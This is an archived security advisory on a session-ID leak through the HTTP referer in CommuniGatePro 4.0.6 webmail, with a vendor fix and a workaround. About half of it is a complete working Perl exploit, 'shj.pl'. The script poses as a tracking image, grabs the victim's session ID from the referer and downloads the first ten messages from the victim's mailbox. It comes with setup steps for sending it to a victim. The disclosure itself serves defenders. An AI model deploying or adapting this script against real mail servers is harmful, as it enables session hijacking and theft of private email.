TUCoPS :: Web :: Apps :: bt116.txt

CommuniGatePro 4.0.6




Vulnerability in CommuniGatePro webmail under some

circumstances may allow attacker to get access to users

mailbox.



Object:

CommuniGatePro version 4.0.6 and earlier.

Not vulnerable (according to Stalker.com) 4.1b2 (with

UseCookies option)

        

Vendor:

Stalker Software Inc. www.stalker.com

                

Description: 

Session ID used in CGP WebMail to track sessions is

transferred in REFERER field of HTTP request when user

browsers requests images or other resources from HTML

message. Attacker can send HTML message with img src

from his server and when user will read it in webmail,

attacker may visit address from REFERER field and

hijack current user session - read mailbox, write

messages, etc.



Mitigating Factors: 

If user has turned on IP session control attacker can

access mailbox only from user IP (or use same proxy).

Access is opened only for duration of session time.





Solution:

Upgrade to 4.1b2 or later version.

        

Workaround: 

There is no known way to fix problem on server side,

but users can configure their browsers, proxy servers

and/or firewalls not to send REFERER field and change

setting to allow only one IP to be used during session

(this option alone doesn't help against exploit if

attacker can use same proxy server as victim).

                

Vendor status: 

Problem was known or long time and mentioned in CGP

maillists. Vendor confirmed problem and fixed in 4.1b2. 



Exploit section

---------------



Exploit howto

-------------

Below is exploit code. Place it into cgi-bin, then

(recommended) make symlink from

DocumentRoot/AnyImage.gif to shj.pl, configure

at least $url variable, and possible other vars and

send victim HTML message with img src to your

AnyImage.gif. When victim will read message, script

will download messages 1..10 from his mailbox (if

sucessfull).



Script will work even if "require fixed address" option

enabled (set $abuseproxy=1), but it needs access to

users proxy (IP will be detected automatically). So, if

your victim uses same corporate proxy as you, then 

you're lucky, you can own his mailbox! :)



If victim uses HTTPS to access CGP webmail, use

https:// link to image. some browsers will still send

HTTP_REFERER if _both_ sites are https.



Exploit code (shj.pl)

------------

#!/usr/bin/perl





#

# session hijacking and mail downloading exploit for

CommuniGatePro 4.0.6

#

# Yaroslav Polyakov. xenon@sysAttack.com www.sysAttack.com

#



use LWP::UserAgent;



# configuration vars

$logfile="/tmp/log";

$url="http://COMMUNIGATE/Session/%SID%/Message.wssp?Mailbox=INBOX&MSG=%N%";

$SIDREGEXP="Session/([0-9a-zA-Z\-]+)/";

$msglonum=1;

$msghinum=10;

$msgprefix="/tmp/hijacked-";

$abuseproxy=1;

$proxyport=3128;



sub printgif

{

$gif1x1="\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\xff\x00\xc0\xc0\xc0

\x00\x00\x00\x21\xf9\x04\x01\x00\x00\x00\x00\x2c\x00\x00\x00\x00

\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3b";





  print "Content-Type: image/gif\n";

  print "\n";

  print "$gif1x1";

}





open LOG, "> $logfile" || die("cant write to my log");

printgif;







$remote=$ENV{'REMOTE_ADDR'};

$referer=$ENV{'HTTP_REFERER'};

print LOG "remote: $remote\nreferer: $referer\n";

# if($referer=~/SID=([0-9a-zA-Z\-]+)/){

if($referer=~/$SIDREGEXP/){

                $SID=$1;

                print LOG "SID: $SID\n";

                }else{

                                print LOG "sorry, cant

find out SID\n";

                                exit;

                }







# create request

my $ua = new LWP::UserAgent;

$ua->agent("shj - sysAttack CGP session HiJack/1.0");



if($abuseproxy){

                print LOG "set proxy

http://$remote:$proxyport/\n";

                $ua->proxy('http',

"http://$remote:$proxyport/");

}



for($index=$msglonum;$index<=$msghinum;$index++){

               $eurl=$url;

                $eurl =~ s/%N%/$index/;

                $eurl =~ s/%SID%/$SID/;

                print LOG "fetching $eurl\n";

                $request = new HTTP::Request("GET", $eurl);

                $response = $ua->request($request);

                if($response){

                                print LOG

$response->code." ".$response->message

."\n";

                                open MSG, ">

$msgprefix$index" or die('cant crea

te $msgprefix$index');

                                print MSG

$response->content;

                                close MSG;

                }else{

                                print LOG "undefined

response\n";

                }

}

close LOG;

===

P.S.



And sorry for bad english :)


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH